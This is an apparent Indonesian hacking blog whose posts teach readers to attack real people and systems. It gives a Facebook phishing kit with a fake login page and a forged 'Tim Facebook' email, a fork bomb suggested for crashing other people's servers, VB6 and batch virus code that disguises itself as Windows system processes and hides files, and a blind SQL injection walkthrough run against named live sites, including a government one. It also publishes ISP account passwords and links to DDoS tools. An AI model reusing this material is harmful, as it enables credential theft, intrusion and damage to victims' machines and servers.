Recent Comments

FBS FOREX

Forex Broker Untuk Pemula

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Space For Ads

Space For Ads
Tampilkan postingan dengan label hacker. Tampilkan semua postingan
Tampilkan postingan dengan label hacker. Tampilkan semua postingan

Kamis, 21 November 2013

cara membuat fake login..

berjumpa lagi dengan sayaaa, kali ini saya akan membuat tutorial atau langkah-langkah..
bagaimana cara memebuat fake login/halaman palsu.. tentunyaa teman teman semua udah tau apa itu fake login.. bagi yang belum tau apa itu fake login, monggo di gogling..

nah langsung sajaaa..
langkah pertama:....
1. terlebih dahulu kita buat accound dengan mendaftar di webhosting gratisan yang mendukung/support PHP.. seperti bytehost, atau webhosting lainnyaa..

2. Ekstrak file code.rar dapat di sedot di  sini kemudian simpan atau upload di suatu direktori di webhosting yang telah kita daftar, misal nya http://NamaKita.bytehost.com/facebook/.. di dalam file code.rar berisi file-file antara lain: terdapat 3 file tersebut yaitu: index.html, logs.php dan logs.txt

3. Buatlah email palsu dengan menyamar sebagagi admin facebook tujuannya agar si target/korban yang kita harapkan percaya.. contohnya : admin_facebook@yahoo .com/admin.facebook@gmail .com/ admin.fb@plasa.com

4. Buat isi pesan dengan nama scriptisiemailpalsu. doc


SCRIPT ISI EMAIL PALSU

Keizen mengajak Anda anda berteman di Facebook. Kami perlu memastikan kepada Anda bahwa Anda memang mengenal  Keizen agar Anda bisa berteman di Facebook.

Untuk mengonfirmasi permintaan pertemanan ini, ikuti tautan di bawah ini:
http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2 

Terima kasih,
Tim Facebook

___
Pesan ini merujuk ke alamat_email_palsu@gmail.com  Ingin mengatur email apa saja yang Anda terima dari Facebook? Kunjungi:
http://www.facebook.com/editaccount.php?notifications&md=ZnJpZW5kO2Zyb209MTI1Mjg0ODc5Njt0bz0xMjQ1Mzg0MzE4&mid=883451G4a3b0e7eG88f1e5G2 
Kantor Facebook beralamat di 1601 S. California Ave., Palo Alto, CA 94304.

lto, CA 94304.
5. Buka isi file tersebut. Lalu ganti nama keizen ganti dengan nama ente dan ganti alamat_email_anda@gm ail.com dengan alamat palsu entee..

6. Lalu pada URL : http://www.facebook.com/n/?reqs.php&...b0e7eG88f1e5G2 ganti dengan URL halaman fake login yang telah kita buat tadi. contoh http://keizen/fileave.com/index/html

7. Setelah semua sudah kita persiapkan, segera kirim isi pesan tersebut ke alamat email si korban. Maka alamat email + password si korban akan datangan dengan sendiri nya ke email palsu yng kita buat tadii..

adapun beberapa cara yang lain, dan lain waktu nanti akan sayaaa bahas lagii..
karena sayaa masih ada tanggungan mengerjakan PR jadi sampe sekian dluu, nnt kita sambung lagii..

Rabu, 20 November 2013

Bikin hang windows hanya dengan 5 karakter (just 5 bytes of file)


Maaf kalo ini repost saya pun juga lupa kalo saya pernah baca ini dimana intinya LUPA..
Setahu saya ini merupakan  virus yang sedikit simple tapi cukup mematikan,.. :D

okee, langsung sajaaa..
Code:
%0|%0

ketik code tersebut di notepad dengan nama terserah anda.bat (harus menggunakan ekstensi .bat) terus kalo yang berani silahkan di coba.. Saya sendiri sih pernah coba dan komputer/laptop anda akan bawel dengan muncul nya memory peringatan 0x? yang error setiap saat, akibat selanjut nya saya sendiri juga kurang tahuu,.. :))


untuk pengembangannya silahkan digabung sama coding VB, C, Java, Perl, PHP, dan lain2 .. tentunya .BAT juga ..
buat yang hobi ngancurin server orang .. kalo nemu server IIS/windows yang udah ditanemin shell coba aja pake ini .. mungkin si server lgsng !CRASH! hehehehe





Code: 
import java.io.*;
public class ffaaddiill {
   static String m = "cmd /C msg * shinobi_master_was_here";
   public static void main(String []args)throws IOException {
      ffaaddiill zombie = new ffaaddiill();
      Runtime.getRuntime().exec(zombie.m);
   }
}


buat yg males nulis program nya.. monggo lgs sedot aja.. 

Rabu, 06 November 2013

Tips dan Trik Koneksi Speedy

logo speedy
persiapan :
1. account speedy dan passwordnya
2. mental doang





caranya :
1. masuk ke http://store.telkomspeedy.com
2. pilih produk yang ingin di order .
3. tekan tombol "berlangganan konten ini" .
4. masukin account speedy , password speedy , email dan kode keamanan .
5. menyetujui TOS layanan .
6. terus klik tombol "pesan" .
7. setelah itu cek email kalian .

untuk yang mau coba2 saya kasih nih account speedynya .

1. account number : 111707102282@telkom. net
password : 431092

2. account number : 111724100671@telkom. net
password : pncdyb17at

3. account number : 111717101385@telkom. net
password : 123456

4. account number : 111706100770@telkom. net
password : suharto

5. account number : 111801105041@telkom. net
password : jksfkc09oe

sekian tips dan trick dari saya . jika ada salah kata mohon maaf .

Senin, 04 November 2013

Teknik dasar pembuatan virus dari vb6

kali ini aku kan mau share cara pembuatan virus pada vb6
kali nie aku ada 8 teknik dasar dalam pembuatan virus
tapi ini si peling simpel dari pada yang lain.

Tutor ini hanyalah merupakan suatu pembelajaran,
yangg berupa konsep dasar dalam pembuatan virus di visual basic
jadi pada dasarnya syntax dibawah ini
nantinya akan kalian kembangkan seprti apa yg kalian inginkan virusnya
ok langsung aja gan

Pertama, bikin form buat virus kamu pake Standart exe saja

1. menyembunyikan Form

Private Sub Form_Load()
App.TaskVisible = False
End Sub


2. Copy Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”


3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder

Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attribute s = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attribute s = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry

Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon

jadi nya seperti ini:
On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Segala Kerusakan  saya tidak bertanggung jawab.. saya cuma share.. :D

Jumat, 01 November 2013

Variasi Tehnik Hacking Web

Terdapat beberapa cara untuk criminal dapat mengancam jaringan web. Berikut list beberapa aksi teknik hacking :

Reconnaissance
Dalam teknik ini, criminal dapat memperoleh informasi mengenai target system, termasuk username, password, parameter input, program atau bahasa script, tipe server, dan system operasi.

Probe
Dalam fase ini criminal mendeteksi kelemahan system SQL injection termasuk dalam teknik ini dan banyak digunakan untuk menemukan hal tersembunyi dan lubang keamanan yang ada.

Toehold
Criminal akan memproses fase ini ketika penyusup masuk ke dalam system, membangun koneksi, biasanya menyerang session, mencari informasi system dan mulai mengeksploitasi kelemahan keamanan.

Advancement
Fase ini criminal akan mencari konfigurasi error dan mengubah ke account user yang masih unprivileged menjadi priilege, atau bergerak dari normal user dengan sedikit izin akses menjadi administrator, dimana setelah itu criminal akan mendapatkan full akses untuk membuat, menghapus, memodifikasi, menerima atau memindahkan file dan informasi.

Stealth
Langkah stealth ini berupa penyamaran keberadaan penyusup yang sudah masuk ke system. Langkah tersebut dilakukan dengan mengakses dan memodifikasi log file untuk menghilangkan bukti yang dapat memberitahukan user mengenai serangan tersebut.

Listening Port
Dalam listening port tersebut, penyusup akan mengeset backdoor, yakni program jahat yang akan memastikan aktivitas selanjutnya tidak bisa dilakukan. Program itu dinamakan stealth, atau tool backdoor, atau sniffer. Selain itu, penyusup juga dapat memberikan informasi yang salah ketika user mengakses file dan memproses jaringan system, dengan tujuan untuk menyamarkan keberadaan user.

Takeover
Digunakan untuk memperluas control dari satu system ke system lain di jaringan yang sama. Penyusup dapat menggunakan sniffer untuk mendeteksi informasi di host lain, seperti username dan password. Step ini dapat digunakan untuk menemukan host computer yang belum terkena hack sehingga penyusup dapat mengakses host lain. Step ini umumnya dilakukan dengan bahasa pemrograman yang simpe dan dikontrol oleh programmer.

Smogar Bermanfaat..
Monggo yang lain di gogel aja karena saya jg nda mau hanya nulis di tangkep polisi nanti.. :D

Blind SQL

BLIND SQL INJECTION
 buat temen2 yg belum tau apa itu SQL-Injection bisa di baca2 dulu di sini.. monggoo


kembali lagi akh.. wkwkwkwk..

mari kita membahas tentang Blind SQL Injection..

Apa sich Blind SQL Injection tu?

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

okey sampe sini aja ah..cape ngetik..wkwkwkw

slamat mencoba..


buat latihan>> www.dkp.go.id/content.php?c=5161 (ingat woi, web negara inii wkwkwk)

Smoga Bermanfaat..

Rabu, 30 Oktober 2013

Tutorial Shell,Eggdrop,PsyBNC for IRC

Nah, Sekarang kita mau ngomongin seluk beluk shell nih, khususnya shell yang dipergunakan untuk kepentingan IRC. Sebelumnya tau ga Shell itu apa?
Shell adalah program khusus yang digunakan sebagai interface antara user dengan kernel.
Lalu apa itu kernel??
Kernel merupakan inti suatu operating system. Secara sederhananya, kernel berfungsi sebagai penghubung antara hardware dengan software yang berjalan pada suatu operating sistem. Kernel di load ke memory saat booting dan berfungsi me-manage system sampai system di shutdown.
Kembali ke masalah shell. Shell merupakan utilitas program yang berjalan saat user log on ke komputer. Shell mengijinkan user untuk berinteraksi dengan kernel dengan cara menginterpretasikan perintah yang diketikkan pada shell.
Ketika command diketikkan, shell bertanggung jawab untuk memparsing command line, meridirect,dan mengeksekusi command tersebut. Command-command yang diketikan bisa ditulis dalam suatu file (Script file) dengan memanfaatkan shell programing. (sbr:Aceh Forum)
Selebihnya cari aja di google yha…
Sekarang mungkin dah ga asing lagi dengan nama Shell, apalagi bagi mereka yang hobby dengan chatting melalui IRC/mIRC. Nah bagaimana cara mendapatkan shell itu? bagi sebagian orang yang berkecukupan mungkin dapat membelinya secara online, tp bagi yang masih belajar ataupun coba-coba bahkan bagi mereka yang malas mengeluarkan uangnya untuk membeli hal seperti ini (seperti penulis :p) anda dapat mendapatkannya secara gratis, dan tentu saja untuk GRATISAN masih ada kekurangannya atau dibatasi pemakaiannya, ataupun dengan syarat yang cukup sulit bagi mereka yang tidak mempunyai koneksi unlimited.
Jujur saja, saya sebenarnya masih sangat awam tentang ini, dan saya baru mendapatkan access shell baru kemarin semenjak tulisan ini diterbitkan, saya menggunakan shell gratisan dari —-not for publish—- (terima kasih bang Awie a.k.a Angin on irc.relaychat.net #id untuk infonya), prosesnya sangat simple, ±10 menit setelah signup akan ada konfirmasi username/pass untuk login ke shell dengan cara download putty / cygwin nah simple kan?!!
Berhubung shell disini berorientasi untuk IRC, selanjutnya untuk pemakaian shell sebagai Bot IRC, kita harus menginstall EggDrop atau PsyBNC ke dalam shell itu(cari artinya masing² ya di Google), ok tanpa perlu panjang lebar saya coba paparkan sedikit masing-masing cara menginstallnya :
Installasi EggDrop
1. Download file eggdropnya di sini dibagian eggdrop file
systrojan@inferno:~$ wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/ eggdrop 1.6.18.tar.gz--06:16:05--  ftp://ftp.eggheads.org/pub/eggdrop/source/1.6 /eggdrop1.6.10.tar.gz=> `eggdrop1.6.10.tar.gz'Resolving ftp.eggheads.org... done.

Connecting to ftp.eggheads.org[207.195.39.240]:21... connected.

Logging in as anonymous ... Logged in!

==> SYST ... done.    ==> PWD ... done.

==> TYPE I ... done.  ==> CWD /pub/eggdrop/source/1.6 ... done.

==> PORT ... done.    ==> RETR eggdrop1.6.10.tar.gz ... done.

Length: 893,527 (unauthoritative)100%[===================================== ================>]

893,527      470.65K/s    ETA 00:00

06:16:07 (470.65 KB/s) - `eggdrop1.6.10.tar.gz' saved [893527]

systrojan@inferno:~$
2. Setelah itu di ekstrak filenya dengan menggunakan perintah tar
systrojan@inferno:~$ tar -zxvf eggdrop1.6.10.tar.gz....

eggdrop1.6.18/src/mod/woobie.mod/woobie.c

eggdrop1.6.18/text/

eggdrop1.6.18/text/CONTENTS

eggdrop1.6.18/text/banner

eggdrop1.6.18/text/motd

eggdrop1.6.18/configure

eggdrop1.6.18/configure.in

systrojan@inferno:~$
3. Masuk ke folder hasil extractnya
systrojan@inferno:~$ cd eggdrop1.6.18systrojan@inferno:~$ [~/eggdrop1.6.18]#
4. Lalu configure sesuai sistemnya
systrojan@inferno [~/eggdrop1.6.18]# ./configureThis is Eggdrop's GNU configure  script.It's going to run a bunch of strange tests to hopefully

make your compile work without much twiddling.

checking for gcc... gcc

checking for C compiler default output... a.out

checking whether the C compiler works... yes

...

...

onfig.status: creating src/mod/Makefile

config.status: creating config.h

creating lush.h

Configure is done.

Type 'make config' to configure the modules, or type 'make iconfig'

to interactively choose which modules to compile.

After that, type 'make' to create the bot.

systrojan@inferno [~/eggdrop1.6.18]#
5.Lalu buat confignya dengan make config
systrojan@inferno [~/eggdrop1.6.18]# make configdetecting modules.................... done.

calculating dependencies................... done.

building ./src/mod/Makefile... done.

make[1]: Entering directory `/home/eggdrop/eggdrop1.6.18/src/mod'Configuring  module compress ...

running in eggdrop mode.

creating cache ../../../config.cache

....

....

creating ./config.status

creating Makefile

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/src/mod'

building ./src/mod/Makefile... done.

You can now compile the bot, using "make".

systrojan@inferno [~/eggdrop1.6.18]#
6. Lalu di make supaya menghasil file binary
systrojan@inferno [~/eggdrop1.6.18]# makemake[1]: Entering directory  `/home/eggdrop/eggdrop1.6.18/src'

(This may take a while.  Go get some runts.)

gcc -pipe -g -O2 -Wall -I.. -I.. -DHAVE_CONFIG_H   -c bg.c

gcc -pipe -g -O2 -Wall -I.. -I.. -DHAVE_CONFIG_H   -c botcmd.c

...

...

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/src/mod'modules made:

-rwxr-xr-x    1 eggdrop  eggdrop      8112 Apr 17 06:23 assoc.so

-rwxr-xr-x    1 eggdrop  eggdrop     13852 Apr 17 06:23 blowfish.so

-rwxr-xr-x    1 eggdrop  eggdrop     97756 Apr 17 06:23 channels.so

-rwxr-xr-x    1 eggdrop  eggdrop      9808 Apr 17 06:23 compress.so

-rwxr-xr-x    1 eggdrop  eggdrop      8704 Apr 17 06:23 console.so

-rwxr-xr-x    1 eggdrop  eggdrop      7612 Apr 17 06:23 ctcp.so

-rwxr-xr-x    1 eggdrop  eggdrop     13724 Apr 17 06:23 dns.so

-rwxr-xr-x    1 eggdrop  eggdrop     93092 Apr 17 06:23 filesys.so

-rwxr-xr-x    1 eggdrop  eggdrop    118620 Apr 17 06:23 irc.so

-rwxr-xr-x    1 eggdrop  eggdrop     25212 Apr 17 06:23 notes.so

-rwxr-xr-x    1 eggdrop  eggdrop     12188 Apr 17 06:23 seen.so

-rwxr-xr-x    1 eggdrop  eggdrop     57052 Apr 17 06:24 server.so

-rwxr-xr-x    1 eggdrop  eggdrop     42972 Apr 17 06:24 share.so

-rwxr-xr-x    1 eggdrop  eggdrop     32980 Apr 17 06:24 transfer.so

-rwxr-xr-x    1 eggdrop  eggdrop      6748 Apr 17 06:24 uptime.so

-rwxr-xr-x    1 eggdrop  eggdrop     12312 Apr 17 06:24 wire.so

Now run "make install" to install your bot.

systrojan@inferno [~/eggdrop1.6.18]#
7.Sekarang tinggal kita make install untuk membuat file eggdrop binarynya
ada dua cara yaitu make install atau make install DEST=/path/tempat/install
kalau make install maka langsung ditaruh di /home/usernamenya/eggdrop
systrojan@inferno [~/eggdrop1.6.18]# make installEggdrop v1.6.18 (C) 1997 Robey  Pointer (C) 2006 EggheadsInstalling in directory: '/home/eggdrop/eggdrop'.

Creating directory: /home/eggdrop/eggdrop.

mkdir /home/eggdrop/eggdrop

...

...

...

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/scripts'

Installation completed.

You MUST ensure that you edit/verify your configuration file.

Use one of the three configuration files (eggdrop.simple.conf,

eggdrop.advanced.conf and eggdrop.complete.conf) distributed

with your bot.

Remember to change directory to /home/systrojan/eggdrop before you proceed.

systrojan@inferno [~/eggdrop1.6.18]#
Selesai sudah install eggdropnya
Sekarang tinggal configurasi botnya, untuk mengedit eggdrop.conf kita
memerlukan pico editor(semacam notepad pada windows) dengan cara :
systrojan@inferno:~/eggdrop$ pico eggdrop.conf
Nah setelah kebuka
GNU nano 2.0.2 File: eggdrop.conf
disini kita harus membaca terlebih dahulu apa saja isinya, termasuk langkah untuk mengeditnya, dapat kita lihat disana, ada beberapa yang kita harus hilangkan tanda “#” untuk mengaktifkan command pada access bot tersebut sesuai kebutuhan, dan perlu diingat “kita harus cukup teliti mengedit file.conf ini agar pada saat compilingnya tidak ada bentuk error”. Dan yg terpenting, di bagian awal pico editor kita hapus :
#! /path/to/executable/eggdrop
..
..
..
# More detailed descriptions of all these settings can be found in
# doc/settings/.
Hasilnya pada bagian awal .conf tersebut kita lihat :
##### BASIC SETTINGS #####
# This setting defines the username the bot uses on IRC. This setting has
# no effect if an ident daemon is running on your bot’s machine.
set username “lamest”
Dan juga kita hapus yang ada tulisan :
die “Please make sure you edit your config file completely.”
Nah sisanya anda tinggal ubah sesuai data yang diinginkan, namun ada satu yang saya masih contek, yaitu pada Channels Module, disana tertera commentar yg cukup banyak, dan tugas anda hapus comment tersebut dan ganti dengan contoh seperti ini :
}
channel add #main {
chanmode “+nt-likm”
idle-kick 0
stopnethack-mode 0
flood-chan 10:60
flood-deop 3:10
flood-kick 3:10
flood-join 5:60
flood-ctcp 3:60
flood-nick 5:60
}
channel set #main +enforcebans +dynamicbans +userbans
channel set #main +dynamicexempts +userexempts +dynamicinvites +userinvites
channel set #main -autoop -bitch +protectops +protectfriends +dontkickops
channel set #main +greet +statuslog
channel set #main +revenge +autovoice
channel set #main -secret -shared -cycle
channel set #main -inactive +seen +nodesynch
#### SERVER MODULE ####
So tau kan batasan mana yang kita harus hapus dan diganti !!!
Setelah selesai editingnya, kluar dari pico editor dengan ketik : [ctrl+x] -> (y)yes -> enter(tdk usah menggati nama eggdrop.conf.
Untuk compilingnya, kita gunakan perintah : ./eggdrop -m eggdrop.conf
Apabila masih ada error anda dapat kembali ke pico editor dan memperbaikinya, apabila ada masalah dalam memperbaikinya, anda dapat share langsung disini atau sebelumnya anda dapat melihat bentuk default eggdrop.conf disini
Nah kurang lebih seperti itu yang bisa saya share pengetahuannya, sisanya anda dapat berlatih sendiri dengan batuan Master Google.
Instalasi PsyBNC
Apasih PsyBNC itu? Bagi yang dah lama malang melintang di dunia irc pasti tau tuh apa PsyBNC , PsyBNC adalah salah satu Irc Bouncer yang sangat mudah digunakan , dan mendukung multi user.
  1. Silahkan login ke shell account kamu.
  2. Download psybnc nya dari sini nih ambil yang versi terbaru yah )
    $ wget http://psybnc.net/psyBNC-2.3.2-7.tar.gz
  1. Extrax file psybnc yang sudah di download tadi.
    $ tar -zxvf psyBNC-2.3.2-7.tar.gz
  1. masuk ke folder psybnc
    $ cd psybnc
  1. Make
    $ make
  1. Edit file psybcn.conf pakai editor kesukaan kamu, vi, nano, pico terserah deh mana yang di sukai , saya sendiri lebih suka menggunakan pico, tapi sayang server saya belum sempat di install pico, jadi pakai vi aja
    $ vi psybnc.conf
    maka muncul seperti ini, tekan i untuk edit setelah edit selesai tekan tombol “esc” yang di pojok kiri atas tuh , untuk menyimpan tekan :wq
    PSYBNC.SYSTEM.PORT1=31337 #<— ganti dengan port yang kamu inginkan misalnya 17485
    PSYBNC.SYSTEM.HOST1=*
    PSYBNC.HOSTALLOWS.ENTRY0=*;*
  1. Psybnc sudah siap di jalankan.
    $ ./psybnc
    .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
    ,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
    | O || ,-’ \ \/ / | o || \| || ,–’
    | _/ _\ \ \ / | o< | |\ || |__
    |_| |____/ |__| |___||_| \_| \___|
    Version 2.3.2-7 (c) 1999-2003
    the most psychoid
    and the cool lam3rz Group IRCnet
    `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’
    Configuration File: psybnc.conf
    Language File: psyBNC Language File – English
    No logfile specified, logging to log/psybnc.log
    Listening on: 0.0.0.0 port 17485
    psyBNC2.3.2-7-cBtITLdDMSNp started (PID 22774)
  1. Okeh psybnc sudah berjalan di server kita silakan buka mirc kamu dan konek ke psybnc kamu sesuai dengan port nya tadi. untuk pertama kali memakai anda perlu setting identd di mirc kamu, terus di inget soalnya identd itu yang dipakai selama konek ke psybnc, klo anda nanti mau konek lagi dengan identd yang berbeda tidak akan bisa
  2. Setelah berhasil konek silahkan baca help nya disini

Belajar Bikin Virus

wkwk.. iseng2 bro.. mari dicoba..tp kerusakan akibat coba2 aku g tanggung jawab lho ya.. cuma ising aja.. :p

PHP Code:
@echo offfor /r "D:\" %%a in (*.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll) do (
   copy %0 "
%%~rahasia.bat" && attrib +s +h "%%~fa"
)
@echo off 




save dengan "namafile".bat (hilangkan "")
jangan lupa bawah nya all files

ini merusak file *.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll yang ada didalam local disk D
dan membua file rahasia.bat di disk D
secara sembunyi" menanti..

 kl berminat download script ny silahkan klik di sini.. INGAT!! SEGALA BENTUK KERUSAKAN SAYA TIDAK BERTANGGUNG JAWAB


Senin, 28 Oktober 2013

Tools buat DDoS

Buat Temen2 yg males scripting tapi pengen melakukan DDoS saya sudah siapkan piranti nya nih...
Silahkan.. DOWNLOAD

kl mau request tools laen sms aja ke 085643039200

Minggu, 27 Oktober 2013

Mendeteksi Virus Alman

Kalian udah tau kan apa itu virus ALMAN ?
ya tu virus di kategorikan virus berbahaya,virus ini bisa meng-injeksi file dengan extensi ".exe,.dll"

file yang udah terinfeksi otomatis berubah menjadi file zombie karena pada file itu sudah disisipi kode virus agar saat file yang terinfeksi di jalankan,kode virus itu juga ikut di jalankan .

bagi agan" developer antivirus,mendeteksi virus alman juga tidak menggunakan cara yang biasa seperti menggunakan checksum
( Md5,Crc32,SHA256,dll )

kalau masih nekat mau make checksum andai saja 2 byte kegeser juga udah ga akan ke detect lagi file nya

karena file yang akan di infeksi si virus kan akan selalu beda ukurannya,ga akan mungkin sama.
so jalan keluar nya adalah menggunakan heuristic,
walaupun heuristic yang bakal ane share disini masih menggunakan metode read string,tapi cara ini ane akuin ampuh buat mendeteksi alman Variant A & B
algoritma nya begini :
Awalnya besar file yang ingin di check di hitung dulu,
apabila file yang akan di check besar nya file nya > 40 KB file di buka lalu di baca isinya dan dicek apakah file nya mengandung string yang tersimpan pada program pendeteksi alman tersebut.
dengan posisi dari ( Besar file terinfeksi - 40 Kb ) & string dalam file sama dengan string yang tersimpan, ini file sudah pasti di infeksi oleh alman


Langsung ajaa yok, TKP..
pertama buka dulu program visual basic nya ,

lalu tambahkan :
1 Buah command button
1 Buah Text Box



masukan code ini pada form
Private Function CekSiAlman(Dimana As String) As Boolean
On Error Resume Next
Static TextExenya As String
Static GedeFileNya As Long
GedeFileNya = FileLen(Dimana)
If GedeFileNya > 40970 Then
    TextExenya = MariMembaca(Dimana)
    If InStr(TextExenya, "¯EI5œ‚ÞùWç‘Ï") > (GedeFileNya - 40970) Then 'lalu balikan jadikan fungsi ceksialman menjadi true
        CekSiAlman = True
    Else
        CekSiAlman = False
    End If
Else
    CekSiAlman = False
End If
End Function

Private Function CekSiAlmanB(Dimana As String) As Boolean
On Error Resume Next
Static TextExenya As String
Static GedeFileNya As Long
GedeFileNya = FileLen(Dimana)
